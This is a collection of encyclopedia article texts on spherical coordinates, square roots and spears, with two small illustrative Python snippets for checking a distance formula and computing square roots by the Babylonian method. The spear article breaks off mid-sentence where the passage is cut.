In the conventions used, ∂r/∂r = r̂, ∂r/∂θ = r θ̂, and ∂r/∂φ = r sin θ φ̂. Thus, the desired coefficients are the magnitudes of these vectors: 1, r, and r sin θ. The surface element spanning from θ to θ + dθ and φ to φ + dφ on a spherical surface at (constant) radius r is then dA = r² sin θ dθ dφ. Thus the differential solid angle is dΩ = sin θ dθ dφ. The surface element in a surface of polar angle θ constant (a cone with vertex at the origin) is dA = r sin θ dr dφ. The surface element in a surface of azimuth φ constant (a vertical half-plane) is dA = r dr dθ. The volume element spanning from r to r + dr, θ to θ + dθ, and φ to φ + dφ is specified by the determinant of the Jacobian matrix of partial derivatives, namely dV = r² sin θ dr dθ dφ. Thus, for example, a function f(r, θ, φ) can be integrated over every point in ℝ³ by the triple integral ∫₀^2π ∫₀^π ∫₀^∞ f(r, θ, φ) r² sin θ dr dθ dφ. The del operator in this system leads to the following expressions for the gradient and Laplacian for scalar fields: ∇f = (∂f/∂r) r̂ + (1/r)(∂f/∂θ) θ̂ + (1/(r sin θ))(∂f/∂φ) φ̂, and ∇²f = (1/r²) ∂/∂r(r² ∂f/∂r) + (1/(r² sin θ)) ∂/∂θ(sin θ ∂f/∂θ) + (1/(r² sin²θ)) ∂²f/∂φ². It likewise leads to expressions for the divergence and curl of vector fields; for the divergence, ∇·A = (1/r²) ∂(r² A_r)/∂r + (1/(r sin θ)) ∂(sin θ A_θ)/∂θ + (1/(r sin θ)) ∂A_φ/∂φ. Further, the inverse Jacobian can be expressed in Cartesian coordinates. The metric tensor in the spherical coordinate system is g = diag(1, r², r² sin²θ). Distance in spherical coordinates In spherical coordinates, given two points P = (r, θ, φ) and Q = (r′, θ′, φ′), with φ being the azimuthal coordinate, the distance between the two points can be expressed as D = √(r² + r′² − 2 r r′ (sin θ sin θ′ cos(φ − φ′) + cos θ cos θ′)). Kinematics In spherical coordinates, the position of a point or particle (although better written as a triple (r, θ, φ)) can be written as r = r r̂. Its velocity is then v = ṙ r̂ + r θ̇ θ̂ + r sin θ φ̇ φ̂, and its acceleration is a = (r̈ − r θ̇² − r sin²θ φ̇²) r̂ + (r θ̈ + 2 ṙ θ̇ − r sin θ cos θ φ̇²) θ̂ + (r sin θ φ̈ + 2 ṙ sin θ φ̇ + 2 r cos θ θ̇ φ̇) φ̂. The angular momentum is L = m r × v = m r² (θ̇ φ̂ − sin θ φ̇ θ̂), where m is the mass. In the case of a constant φ, or else θ = π/2, this reduces to vector calculus in polar coordinates. The corresponding angular momentum operator then follows from the phase-space reformulation of the above: L̂ = −iħ r × ∇. The torque is given as τ = r × F = dL/dt. The kinetic energy is given as T = (m/2)(ṙ² + r² θ̇² + r² sin²θ φ̇²).
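As a quick sanity check on the distance formula above, one can convert both points to Cartesian coordinates and compare against the ordinary Euclidean distance. A small Python sketch (illustrative only):

```python
import math

def to_cartesian(r, t, p):
    # ISO convention: t = inclination, p = azimuth.
    return r * math.sin(t) * math.cos(p), r * math.sin(t) * math.sin(p), r * math.cos(t)

def spherical_distance(r1, t1, p1, r2, t2, p2):
    # D^2 = r1^2 + r2^2 - 2 r1 r2 (sin t1 sin t2 cos(p1 - p2) + cos t1 cos t2)
    c = math.sin(t1) * math.sin(t2) * math.cos(p1 - p2) + math.cos(t1) * math.cos(t2)
    return math.sqrt(r1 * r1 + r2 * r2 - 2.0 * r1 * r2 * c)

P, Q = (1.0, 0.3, 0.5), (2.0, 1.2, -0.7)
direct = math.dist(to_cartesian(*P), to_cartesian(*Q))
print(spherical_distance(*P, *Q), direct)  # the two values should agree
```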
Mathematics
Geometry: General
null
29208
https://en.wikipedia.org/wiki/Square%20root
Square root
In mathematics, a square root of a number x is a number y such that y² = x; in other words, a number y whose square (the result of multiplying the number by itself, or y ⋅ y) is x. For example, 4 and −4 are square roots of 16 because 4² = (−4)² = 16. Every nonnegative real number x has a unique nonnegative square root, called the principal square root or simply the square root (with a definite article, see below), which is denoted by √x, where the symbol "√" is called the radical sign or radix. For example, to express the fact that the principal square root of 9 is 3, we write √9 = 3. The term (or number) whose square root is being considered is known as the radicand. The radicand is the number or expression underneath the radical sign, in this case, 9. For non-negative x, the principal square root can also be written in exponent notation, as x^(1/2). Every positive number x has two square roots: √x (which is positive) and −√x (which is negative). The two roots can be written more concisely using the ± sign as ±√x. Although the principal square root of a positive number is only one of its two square roots, the designation "the square root" is often used to refer to the principal square root. Square roots of negative numbers can be discussed within the framework of complex numbers. More generally, square roots can be considered in any context in which a notion of the "square" of a mathematical object is defined. These include function spaces and square matrices, among other mathematical structures. History The Yale Babylonian Collection clay tablet YBC 7289 was created between 1800 BC and 1600 BC, showing √2 and √2/2 respectively as the base-60 numbers 1;24,51,10 and 0;42,25,35 on a square crossed by two diagonals. (1;24,51,10) base 60 corresponds to 1.41421296..., which is correct to 5 decimal places (1.41421356...). The Rhind Mathematical Papyrus is a copy from 1650 BC of an earlier Berlin Papyrus and other texts (possibly the Kahun Papyrus) that shows how the Egyptians extracted square roots by an inverse proportion method. In Ancient India, the knowledge of theoretical and applied aspects of square and square root was at least as old as the Sulba Sutras, dated around 800–500 BC (possibly much earlier). A method for finding very good approximations to the square roots of 2 and 3 is given in the Baudhayana Sulba Sutra. Apastamba, who is dated around 600 BCE, gave a strikingly accurate value for √2, correct up to five decimal places. Aryabhata, in the Aryabhatiya (section 2.4), has given a method for finding the square root of numbers having many digits. It was known to the ancient Greeks that square roots of positive integers that are not perfect squares are always irrational numbers: numbers not expressible as a ratio of two integers (that is, they cannot be written exactly as m/n, where m and n are integers). This is the theorem Euclid X, 9, almost certainly due to Theaetetus, dating back to the 4th century BC. The discovery of irrational numbers, including the particular case of the square root of 2, is widely associated with the Pythagorean school. Although some accounts attribute the discovery to Hippasus, the specific contributor remains uncertain due to the scarcity of primary sources and the secretive nature of the brotherhood. The square root of 2 is exactly the length of the diagonal of a square with side length 1.
In the Chinese mathematical work Writings on Reckoning, written between 202 BC and 186 BC during the early Han dynasty, the square root is approximated by using an "excess and deficiency" method, which says to "...combine the excess and deficiency as the divisor; (taking) the deficiency numerator multiplied by the excess denominator and the excess numerator times the deficiency denominator, combine them as the dividend." A symbol for square roots, written as an elaborate R, was invented by Regiomontanus (1436–1476). An R was also used for radix to indicate square roots in Gerolamo Cardano's Ars Magna. According to historian of mathematics D.E. Smith, Aryabhata's method for finding the square root was first introduced in Europe by Cataneo, in 1546. According to Jeffrey A. Oaks, Arabs used the letter jīm/ĝīm (ج), the first letter of the word "جذر" (variously transliterated as jaḏr, jiḏr, ǧaḏr or ǧiḏr, "root"), placed in its initial form over a number to indicate its square root. The letter jīm resembles the present square root shape. Its usage goes back as far as the end of the twelfth century, in the works of the Moroccan mathematician Ibn al-Yasamin. The symbol "√" for the square root was first used in print in 1525, in Christoph Rudolff's Coss. Properties and uses The principal square root function f(x) = √x (usually just referred to as the "square root function") is a function that maps the set of nonnegative real numbers onto itself. In geometrical terms, the square root function maps the area of a square to its side length. The square root of x is rational if and only if x is a rational number that can be represented as a ratio of two perfect squares. (See square root of 2 for proofs that this is an irrational number, and quadratic irrational for a proof for all non-square natural numbers.) The square root function maps rational numbers into algebraic numbers (the latter being a superset of the rational numbers). For all real numbers x, √(x²) = |x| (see absolute value). For all nonnegative real numbers x and y, √(xy) = √x √y and √x = x^(1/2). The square root function is continuous for all nonnegative x, and differentiable for all positive x. If f denotes the square root function, its derivative is given by f′(x) = 1/(2√x). The Taylor series of √(1 + x) about x = 0 converges for |x| ≤ 1, and is given by √(1 + x) = 1 + x/2 − x²/8 + x³/16 − 5x⁴/128 + ⋯. The square root of a nonnegative number is used in the definition of Euclidean norm (and distance), as well as in generalizations such as Hilbert spaces. It defines an important concept of standard deviation used in probability theory and statistics. It has a major use in the formula for solutions of a quadratic equation. Quadratic fields and rings of quadratic integers, which are based on square roots, are important in algebra and have uses in geometry. Square roots frequently appear in mathematical formulas elsewhere, as well as in many physical laws. Square roots of positive integers A positive number has two square roots, one positive, and one negative, which are opposite to each other. When talking of the square root of a positive integer, it is usually the positive square root that is meant. The square roots of an integer are algebraic integers, more specifically quadratic integers. The square root of a positive integer is the product of the roots of its prime factors, because the square root of a product is the product of the square roots of the factors. Since √(p²ᵏ) = pᵏ, only roots of those primes having an odd power in the factorization are necessary.
More precisely, the square root of a prime factorization is √(p₁^a₁ p₂^a₂ ⋯ pₙ^aₙ) = p₁^(a₁/2) p₂^(a₂/2) ⋯ pₙ^(aₙ/2). As decimal expansions The square roots of the perfect squares (e.g., 0, 1, 4, 9, 16) are integers. In all other cases, the square roots of positive integers are irrational numbers, and hence have non-repeating decimals in their decimal representations. Decimal approximations of the square roots of the first few natural numbers are given in the following table. As expansions in other numeral systems As before, the square roots of the perfect squares (e.g., 0, 1, 4, 9, 16) are integers. In all other cases, the square roots of positive integers are irrational numbers, and therefore have non-repeating digits in any standard positional notation system. The square roots of small integers are used in both the SHA-1 and SHA-2 hash function designs to provide nothing up my sleeve numbers. As periodic continued fractions A result from the study of irrational numbers as simple continued fractions was obtained by Joseph Louis Lagrange around 1780. Lagrange found that the representation of the square root of any non-square positive integer as a continued fraction is periodic. That is, a certain pattern of partial denominators repeats indefinitely in the continued fraction. In a sense these square roots are the very simplest irrational numbers, because they can be represented with a simple repeating pattern of integers. The square bracket notation used above is a short form for a continued fraction. Written in the more suggestive algebraic form, the simple continued fraction for the square root of 11, [3; 3, 6, 3, 6, ...], looks like this: √11 = 3 + 1/(3 + 1/(6 + 1/(3 + 1/(6 + ⋯)))), where the two-digit pattern {3, 6} repeats over and over again in the partial denominators. Since 11 = 3² + 2, the above is also identical to the following generalized continued fraction: √11 = 3 + 2/(6 + 2/(6 + 2/(6 + ⋯))). Computation Square roots of positive numbers are not in general rational numbers, and so cannot be written as a terminating or recurring decimal expression. Therefore, in general, any attempt to compute a square root expressed in decimal form can only yield an approximation, though a sequence of increasingly accurate approximations can be obtained. Most pocket calculators have a square root key. Computer spreadsheets and other software are also frequently used to calculate square roots. Pocket calculators typically implement efficient routines, such as Newton's method (frequently with an initial guess of 1), to compute the square root of a positive real number. When computing square roots with logarithm tables or slide rules, one can exploit the identities √a = e^((ln a)/2) = 10^((log₁₀ a)/2), where ln and log₁₀ are the natural and base-10 logarithms. By trial-and-error, one can square an estimate for √a and raise or lower the estimate until it agrees to sufficient accuracy. For this technique it is prudent to use the identity (x + c)² = x² + c(2x + c), as it allows one to adjust the estimate x by some amount c and measure the square of the adjustment in terms of the original estimate and its square. The most common iterative method of square root calculation by hand is known as the "Babylonian method" or "Heron's method" after the first-century Greek philosopher Heron of Alexandria, who first described it. The method uses the same iterative scheme as the Newton–Raphson method yields when applied to the function f(x) = x² − a, using the fact that its slope at any point is f′(x) = 2x, but predates it by many centuries. The algorithm is to repeat a simple calculation that results in a number closer to the actual square root each time it is repeated with its result as the new input.
The motivation is that if x is an overestimate to the square root of a nonnegative real number a, then a/x will be an underestimate, and so the average of these two numbers is a better approximation than either of them. However, the inequality of arithmetic and geometric means shows this average is always an overestimate of the square root (as noted below), and so it can serve as a new overestimate with which to repeat the process, which converges as a consequence of the successive overestimates and underestimates being closer to each other after each iteration. To find √a: 1. Start with an arbitrary positive start value x. The closer to the square root of a, the fewer the iterations that will be needed to achieve the desired precision. 2. Replace x by the average (x + a/x)/2 between x and a/x. 3. Repeat from step 2, using this average as the new value of x. That is, if an arbitrary guess for √a is x₀, and xₙ₊₁ = (xₙ + a/xₙ)/2, then each xₙ is an approximation of √a which is better for large n than for small n. If a is positive, the convergence is quadratic, which means that in approaching the limit, the number of correct digits roughly doubles in each next iteration. If a = 0, the convergence is only linear; however, √0 = 0, so in this case no iteration is needed. Using the identity √a = 2⁻ⁿ √(4ⁿ a), the computation of the square root of a positive number can be reduced to that of a number in the range [1, 4). This simplifies finding a start value for the iterative method that is close to the square root, for which a polynomial or piecewise-linear approximation can be used. The time complexity for computing a square root with n digits of precision is equivalent to that of multiplying two n-digit numbers. Another useful method for calculating the square root is the shifting nth root algorithm, applied for n = 2. The name of the square root function varies from programming language to programming language, with sqrt (often pronounced "squirt") being common, used in C and derived languages such as C++, JavaScript, PHP, and Python. Square roots of negative and complex numbers The square of any positive or negative number is positive, and the square of 0 is 0. Therefore, no negative number can have a real square root. However, it is possible to work with a more inclusive set of numbers, called the complex numbers, that does contain solutions to the square root of a negative number. This is done by introducing a new number, denoted by i (sometimes by j, especially in the context of electricity where i traditionally represents electric current) and called the imaginary unit, which is defined such that i² = −1. Using this notation, we can think of i as the square root of −1, but we also have (−i)² = i² = −1, and so −i is also a square root of −1. By convention, the principal square root of −1 is i, or more generally, if x is any nonnegative number, then the principal square root of −x is √(−x) = i√x. The right side (as well as its negative) is indeed a square root of −x, since (i√x)² = i²(√x)² = −x. For every non-zero complex number z there exist precisely two numbers w such that w² = z: the principal square root of z (defined below), and its negative. Principal square root of a complex number To find a definition for the square root that allows us to consistently choose a single value, called the principal value, we start by observing that any complex number x + iy can be viewed as a point (x, y) in the plane, expressed using Cartesian coordinates. The same point may be reinterpreted using polar coordinates as the pair (r, φ), where r ≥ 0 is the distance of the point from the origin, and φ is the angle that the line from the origin to the point makes with the positive real (x) axis.
In complex analysis, the location of this point is conventionally written r e^(iφ). If z = r e^(iφ) with −π < φ ≤ π, then the principal square root of z is defined to be the following: √z = √r e^(iφ/2). The principal square root function is thus defined using the non-positive real axis as a branch cut. If z is a non-negative real number (which happens if and only if φ = 0), then the principal square root of z is √r; in other words, the principal square root of a non-negative real number is just the usual non-negative square root. It is important that −π < φ ≤ π, because if, for example, z = −2i (so φ = −π/2), then the principal square root is √(−2i) = √2 e^(−iπ/4) = 1 − i, but using the angle 3π/2 instead would produce the other square root, −1 + i. The principal square root function is holomorphic everywhere except on the set of non-positive real numbers (on strictly negative reals it is not even continuous). The above Taylor series for √(1 + x) remains valid for complex numbers x with |x| < 1. The above can also be expressed in terms of trigonometric functions: √z = √r (cos(φ/2) + i sin(φ/2)). Algebraic formula When the number z = a + bi is expressed using its real and imaginary parts, the following formula can be used for the principal square root: √z = √((|z| + a)/2) + i sgn(b) √((|z| − a)/2), where sgn(b) = 1 if b ≥ 0 and sgn(b) = −1 otherwise. In particular, the imaginary parts of the original number and the principal value of its square root have the same sign. The real part of the principal value of the square root is always nonnegative. For example, the principal square roots of ±i are given by √i = (1 + i)/√2 and √(−i) = (1 − i)/√2.
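The Babylonian iteration described in the Computation section above is only a few lines in code. A minimal Python sketch (the function name and tolerance handling are illustrative assumptions):

```python
def babylonian_sqrt(a, x0=1.0, rel_tol=1e-12):
    # Heron's/Babylonian method: repeatedly replace x by the average of
    # x and a/x. For a > 0 the iteration converges quadratically.
    if a == 0:
        return 0.0
    x = x0
    while True:
        nxt = 0.5 * (x + a / x)
        if abs(nxt - x) <= rel_tol * nxt:
            return nxt
        x = nxt

print(babylonian_sqrt(2.0))  # 1.4142135623730951
```

Because convergence is quadratic for positive radicands, the number of correct digits roughly doubles per iteration; starting from x0 = 1, √2 is obtained to machine precision in about five iterations.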
Mathematics
Basics
null
29234
https://en.wikipedia.org/wiki/Spear
Spear
A spear is a polearm consisting of a shaft, usually of wood, with a pointed head. The head may be simply the sharpened end of the shaft itself, as is the case with fire hardened spears, or it may be made of a more durable material fastened to the shaft, such as bone, flint, obsidian, copper, bronze, iron, or steel. The most common design for hunting or warfare, since ancient times, has incorporated a metal spearhead shaped like a triangle, diamond, or leaf. The heads of fishing spears usually feature multiple sharp points, with or without barbs. Spears can be divided into two broad categories: those designed for thrusting as a melee weapon (including weapons such as lances and pikes) and those designed for throwing as a ranged weapon (usually referred to as javelins). The spear has been used throughout human history as a weapon for hunting and fishing and for warfare. Along with the club, knife, and axe, it is one of the earliest and most widespread tools ever developed by early humans. As a weapon, it may be wielded with either one or two hands. It was used in virtually every conflict up until the modern era, and it lives on even today in the form of the bayonet fixed onto the muzzle of a long gun. Etymology The word spear comes from the Old English spere, from the Proto-Germanic speri, from a Proto-Indo-European root *sper- "spear, pole". Origins Spear manufacture and use is not confined to humans. It is also practiced by the western chimpanzee. Chimpanzees near Kédougou, Senegal, have been observed creating spears by breaking straight limbs off trees, stripping them of their bark and side branches, and sharpening one end with their teeth. They then used the weapons to hunt galagos sleeping in hollows. Prehistory The Clacton Spear found in England and the Schöningen spears found in present-day Germany document that wooden spears have been used for hunting since at least 400,000 years ago. A 2012 study from the site of Kathu Pan in South Africa suggests that hominids, possibly Homo heidelbergensis, may have developed the technology of hafted stone-tipped spears in Africa about 500,000 years ago. Wood does not preserve well, however, and Craig Stanford, a primatologist and professor of anthropology at the University of Southern California, has suggested that the discovery of spear use by chimpanzees means that early humans may have used wooden spears before this. From circa 200,000 BC onwards, Middle Paleolithic humans began to make complex stone blades with flaked edges which were used as spear heads. These stone heads could be fixed to the spear shaft by gum or resin or by bindings made of animal sinew, leather strips or vegetable matter. During this period, a clear difference remained between spears designed to be thrown and those designed to be used in hand-to-hand combat. By the Magdalenian period (c. 15,000–9500 BC), spear-throwers similar to the later atlatl were in use. Military Europe Classical antiquity Ancient Greeks The spear is the main weapon of the warriors of Homer's Iliad. The use of both a single thrusting spear and two throwing spears are mentioned. It has been suggested that two styles of combat are being described: an early style, with thrusting spears, dating to the Mycenaean period in which the Iliad is set, and, anachronistically, a later style, with throwing spears, from Homer's own Archaic period. In the 7th century BC, the Greeks evolved a new close-order infantry formation, the phalanx.
The key to this formation was the hoplite, who was equipped with a large, circular, bronze-faced shield (aspis) and a spear with an iron head and bronze butt-spike (doru). The hoplite phalanx dominated warfare among the Greek city-states from the 7th into the 4th century BC. The 4th century saw major changes. One was the greater use of peltasts, light infantry armed with spear and javelins. The other was the development of the sarissa, a long two-handed pike, by the Macedonians under Philip II of Macedon and Alexander the Great. The pike phalanx, supported by peltasts and cavalry, became the dominant mode of warfare among the Greeks from the late 4th century onward until Greek military systems were supplanted by the Roman legions. Ancient Romans In the pre-Marian Roman armies, the first two lines of battle, the hastati and principes, often fought with a sword called a gladius and pila, heavy javelins that were specifically designed to be thrown at an enemy to pierce and foul a target's shield. Originally the principes were armed with a short spear called a hasta, but these gradually fell out of use, eventually being replaced by the gladius. The third line, the triarii, continued to use the hasta. From the late 2nd century BC, all legionaries were equipped with the pilum. The pilum continued to be the standard legionary spear until the end of the 2nd century AD. Auxilia, however, were equipped with a simple hasta and, perhaps, javelins or darts. During the 3rd century AD, although the pilum continued to be used, legionaries usually were equipped with other forms of throwing and thrusting spear, similar to auxilia of the previous century. By the 4th century, the pilum had effectively disappeared from common use. In the late period of the Roman Empire, the spear became more often used because of its anti-cavalry capabilities, as the barbarian invasions were often conducted by peoples with a developed culture of cavalry warfare. Medieval period After the fall of the Western Roman Empire, the spear and shield continued to be used by nearly all Western European cultures. Since a medieval spear required only a small amount of steel along the sharpened edges (most of the spear-tip was wrought iron), it was an economical weapon. Quick to manufacture, and needing less smithing skill than a sword, it remained the main weapon of the common soldier. The Vikings, for instance, although often portrayed with an axe, sword, or lance in hand, were armed mostly with spears, as were their Anglo-Saxon, Irish, or continental contemporaries. Spears eventually evolved into lances, which is the source of the later depiction of lance-armed warriors. With the majority of medieval weapons being spears, they became integrated into many battlefield tactics. Spears were very commonly used in defensive blocks; when men on horses tried to get past these blocks, they would often be killed by the spears that could poke through the shield walls. Spears became more common than swords and axes because they were cheaper, longer, and faster to make. Infantry Broadly speaking, spears were either designed to be used in melee, or to be thrown. Within this simple classification, there was a remarkable range of types. For example, M. J. Swanton identified thirty different spearhead categories and sub-categories in early Saxon England. Most medieval spearheads were generally leaf-shaped.
Notable types of early medieval spears include the angon, a throwing spear with a long head similar to the Roman pilum, used by the Franks and Anglo-Saxons, and the winged (or lugged) spear, which had two prominent wings at the base of the spearhead, either to prevent the spear penetrating too far into an enemy or to aid in spear fencing. Originally a Frankish weapon, the winged spear also was popular with the Vikings. It would become the ancestor of later medieval polearms, such as the partisan and spetum. The thrusting spear also has the advantage of reach, being considerably longer than other weapon types. Exact spear lengths are hard to deduce, as few spear shafts survive archaeologically. Some nations were noted for their long spears, including the Scots and the Flemish. Spears usually were used in tightly ordered formations, such as the shield wall or the schiltron. To resist cavalry, spear shafts could be planted against the ground. William Wallace drew up his schiltrons in a circle at the Battle of Falkirk in 1298 to deter charging cavalry; this was a widespread tactic sometimes known as the "crown" formation. Thomas Randolph, 1st Earl of Moray, used a circular schiltron on the first day of the Battle of Bannockburn. However, the rectangular schiltron was much more common and was used by King Robert the Bruce on the second day of the Battle of Bannockburn and in the Battle of Old Byland, where he defeated English armies. Throwing spears became rarer as the Middle Ages drew on, but survived in the hands of specialists such as the Catalan Almogavars. They were commonly used in Ireland until the end of the 16th century. Spears began to fall out of favor among the infantry during the 14th century, being replaced by polearms that combined the thrusting properties of the spear with the cutting properties of the axe, such as the halberd. Where spears were retained they grew in length, eventually evolving into pikes, which would be a dominant infantry weapon in the 16th and 17th centuries. Cavalry Cavalry spears were originally the same as infantry spears and were often used with two hands or held with one hand overhead. In the 12th century, after the adoption of stirrups and a high-cantled saddle, the spear became a decidedly more powerful weapon. A mounted knight would secure the lance by holding it with one hand and tucking it under the armpit (the couched lance technique). In combination with a lance rest, this allowed all the momentum of the horse and knight to be focused on the weapon's tip, whilst still retaining accuracy and control. This use of the spear spurred the development of the lance as a distinct weapon that was perfected in the medieval sport of jousting. In the 14th century, tactical developments meant that knights and men-at-arms often fought on foot. This led to the practice of shortening the lance to make it more manageable. As dismounting became commonplace, specialist polearms such as the pollaxe were adopted by knights and this practice ceased. Introduction of gunpowder The development of both the long, two-handed pike and gunpowder firearms in Renaissance Europe saw an ever-increasing focus on integrated infantry tactics. Those infantry not armed with these weapons carried variations on the polearm, including the halberd and the bill. At the start of the Renaissance, cavalry remained predominantly lance-armed; gendarmes with the heavy knightly lance and lighter cavalry with a variety of lighter lances.
By the 1540s, however, pistol-armed cavalry called reiters were beginning to make their mark. Cavalry armed with pistols and other lighter firearms, along with a sword, had virtually replaced lance-armed cavalry in Western Europe by the beginning of the 17th century. Ultimately, the spear proper was rendered obsolete on the battlefield. Its last flowering was the half-pike or spontoon, a shortened version of the pike carried by officers of various ranks. While originally a weapon, this came to be seen more as a badge of office, or leading staff by which troops were directed. The half-pike, sometimes known as a boarding pike, was also used as a weapon on board ships until the late 19th century. Middle East Modern era Muslim warriors used a spear that was called an az-zaġāyah. Berbers pronounced it zaġāya, but the English term, derived from Berber via Old French, is "assegai". It is a polearm used for throwing or hurling, usually a light spear or javelin made of hard wood and pointed with a forged iron tip. The az-zaġāyah played an important role during the Islamic conquest as well as during later periods, well into the 20th century. A longer-poled az-zaġāyah was used as a hunting weapon from horseback. The az-zaġāyah was widely used; it existed in various forms in areas stretching from Southern Africa to the Indian subcontinent, although these places already had their own variants of the spear. This javelin was the weapon of choice during the Fulani jihad as well as during the Mahdist War in Sudan. It is still being used by certain wandering Sufi ascetics (dervishes). Asia China In the Chinese martial arts, the Chinese spear (Qiang 槍) is popularly known as the "king of weapons". The spear is listed in the group of the four major weapons (along with the gun (staff), the dao (a single-edged blade similar to a sabre), and the jian (sword)). Spears were first used as hunting weapons amongst the ancient Chinese. They became popular as infantry weapons during the Warring States and Qin era, when spearmen were used as highly disciplined soldiers in organized group attacks. When used in formation fighting, spearmen would line up their large rectangular or circular shields in a shieldwall manner. The Qin also employed long spears (more akin to a pike) in formations similar to those of Swiss pikemen in order to ward off cavalry. The Han Empire would use tactics similar to those of its Qin predecessors. Halberds, polearms, and dagger axes were also common weapons during this time. Spears were also common weaponry for Warring States, Qin, and Han era cavalry units. During these eras, the spear would develop into a longer lance-like weapon used for cavalry charges. There are many words in Chinese that would be classified as a spear in English. The Mao is the predecessor of the Qiang. The first bronze Mao appeared in the Shang dynasty. This weapon was less prominent on the battlefield than the ge (dagger-axe). In some archaeological examples two tiny holes or ears can be found in the blade of the spearhead near the socket; these holes were presumably used to attach tassels, much like those on modern-day wushu spears. In the early Shang, the Mao appears to have had a relatively short and narrow shaft, as opposed to the Mao of the later Shang and Western Zhou period. Some Mao from this era are heavily decorated, as is evidenced by a Warring States period Mao from the Ba Shu area. In the Han dynasty the Mao and the Ji (戟, loosely definable as a halberd) rose to prominence in the military.
Notably, the number of iron Mao heads found exceeds the number of bronze heads. By the end of the Han dynasty (Eastern Han), the replacement of bronze by the iron Mao had been completed, and the bronze Mao had been rendered completely obsolete. After the Han dynasty, toward the Sui and Tang dynasties, the Mao used by cavalry were fitted with much longer shafts, as mentioned above. During this era, the use of the Shuo (矟) was widespread among the footmen. The Shuo can be likened to a pike or simply a long spear. After the Tang dynasty, the popularity of the Mao declined and it was replaced by the Qiang (枪). The Tang dynasty divided the Qiang into four categories: "一曰漆枪, 二曰木枪, 三曰白杆枪, 四曰扑头枪。" Roughly translated, the four categories are: Qi (a kind of wood) spears, wooden spears, Bai Gan (a kind of wood) spears, and Pu Tou Qiang. The Qiang that were produced in the Song and Ming dynasties consisted of four major parts: spearhead, shaft, end spike, and tassel. The types of Qiang that exist are many. Among the types there are cavalry Qiang that were the length of one zhang (a traditional Chinese unit of roughly three metres), Little-Flower Spears (Xiao Hua Qiang 小花枪) that are the length of one person with their arm extended above the head, double hooked spears, single hooked spears, ringed spears and many more. There is some confusion as to how to distinguish the Qiang from the Mao, as they are obviously very similar. Some people say that a Mao is longer than a Qiang; others say that the main difference is the stiffness of the shaft, where the Qiang would be flexible and the Mao would be stiff. Scholars seem to lean toward the latter explanation more than the former. Because of the difference in the construction of the Mao and the Qiang, the usage is also different, though there is no definitive answer as to what exactly the differences are between the Mao and the Qiang. India Spears are known as Bhala in Indian languages. Spears in Indian society were used in both missile and non-missile form, both by cavalry and foot-soldiers. Mounted spear-fighting was practiced using a ball-tipped wooden lance called a bothati, the end of which was covered in dye so that hits could be confirmed. Spears were constructed from a variety of materials, such as the sang, made completely of steel, and the ballam, which had a bamboo shaft. The Arab presence in Sindh and the Mameluks of Delhi introduced the Middle Eastern javelin into India. The Rajputs wielded a type of spear for infantrymen which had a club integrated into the spearhead, and a pointed butt end. Other spears had forked blades, several spear-points, and numerous other innovations. One particular spear unique to India was the vita or corded lance. Used by the Maratha Army, it had a rope connecting the spear with the user's wrist, allowing the weapon to be thrown and pulled back. The Vel is a type of spear or lance that originated in Southern India, primarily used by Tamils. Sikh Nihangs sometimes carry a spear even today. Spears were used in conflicts and training by armed paramilitary units such as the razakars of the Nizams of Hyderabad State as late as the second half of the 20th century. Japan The hoko spear was used in ancient Japan sometime between the Yayoi period and the Heian period, but it became unpopular as early samurai often acted as horseback archers. Medieval Japan employed spears again for infantrymen to use, but it was not until the 11th century that samurai began to prefer spears over bows.
Several polearms were used in Japanese warfare. The naginata was a glaive-like weapon with a long, curved blade, popular among the samurai and the Buddhist warrior-monks and often used against cavalry. The yari was a longer polearm with a straight-bladed spearhead, which became the weapon of choice of both the samurai and the ashigaru (footmen) during the Warring States Era; mounted samurai used a shorter yari for single-handed combat, while ashigaru infantry used long yari (similar to the European pike) in massed combat formations. Philippines Filipino spears (sibat) were used as both a weapon and a tool throughout the Philippines. The sibat is also called a bangkaw (after the Bankaw Revolt), sumbling, or palupad in the islands of Visayas and Mindanao. Sibat are typically made from rattan, either with a sharpened tip or a head made from metal. These heads may be single-edged, double-edged, or barbed. Styles vary according to function and origin. For example, a sibat designed for fishing may not be the same as those used for hunting. The spear was used as the primary weapon in expeditions and battles against neighbouring island kingdoms, and it became famous during the 1521 Battle of Mactan, where the chieftain Lapu Lapu of Cebu fought against Spanish forces led by Ferdinand Magellan, who was subsequently killed. Africa South Africa The various types of the assegai (a light spear or javelin made of wood and pointed with an iron or fire-hardened tip) were used throughout Africa, and it was the most common weapon used before the introduction of firearms. The Zulu, Xhosa and other Nguni tribes of South Africa were renowned for their use of the assegai. Shaka of the Zulu invented a shorter stabbing spear with a shortened shaft and a larger, broader blade one foot (0.3 m) long. This weapon is otherwise known as the iklwa or ixwa, after the sound that was heard as it was withdrawn from the victim's wound. The traditional spear was not abandoned, but was used to attack enemy formations at range before closing in for close-quarters battle with the iklwa. This tactical combination originated during Shaka's military reforms. This weapon was typically used with one hand, while the off hand held a cowhide shield for protection. Egypt Similar to most armies of their period, Ancient Egyptian forces were centered around the use of the spear. In battle, spearmen would be armed with a bronze-tipped spear (dja) and shield (ikem), which were used in elaborate formations much like Greek and Roman forces. Before the Hyksos invasion of Egypt, wooden spears were used, which were prone to splinter, but the influx of a new population brought innovations in bronze technology. Unlike other cultures who wielded spears at this time, the Egyptians did not treat their javelins (around 1 metre, or 3.3 feet, long) as disposable, using them both for thrusting and throwing. The Americas West Mexico and South America (Pre-Columbian) As advanced metallurgy was largely unknown in pre-Columbian America outside of Western Mexico and South America, most weapons in Meso-America were made of wood or obsidian. This did not mean that they were less lethal, as obsidian may be sharpened to become many times sharper than steel. Meso-American spears varied greatly in shape and size. While the Aztecs preferred the sword-like macuahuitl clubs for fighting, the advantage of a far-reaching thrusting weapon was recognised, and a large portion of the army would carry the tepoztopilli into battle.
The tepoztopilli was a polearm, and to judge from depictions in various Aztec codices, it was roughly the height of a man, with a broad wooden head about twice the length of the user's palm or shorter, edged with razor-sharp obsidian blades which were deeply set in grooves carved into the head, and cemented in place with bitumen or plant resin as an adhesive. The tepoztopilli was able both to thrust and slash effectively. Throwing spears also were used extensively in Meso-American warfare, usually with the help of an atlatl. Throwing spears were typically shorter and more streamlined than the tepoztopilli, and some had obsidian edges for greater penetration. Native Americans Typically, most spears made by Native Americans were created from materials available around their communities. Usually, the shaft of the spear was made from a wooden stick, while the head of the spear was fashioned from arrowheads, pieces of metal such as copper, or a bone that had been sharpened. Spears were a preferred weapon by many, since they were inexpensive to create, their use could easily be taught to others, and they could be made quickly and in large quantities. Native Americans used the buffalo pound method to kill buffalo, which required a hunter to dress as a buffalo and lure one into a ravine where other hunters were hiding. Once the buffalo appeared, the other hunters would 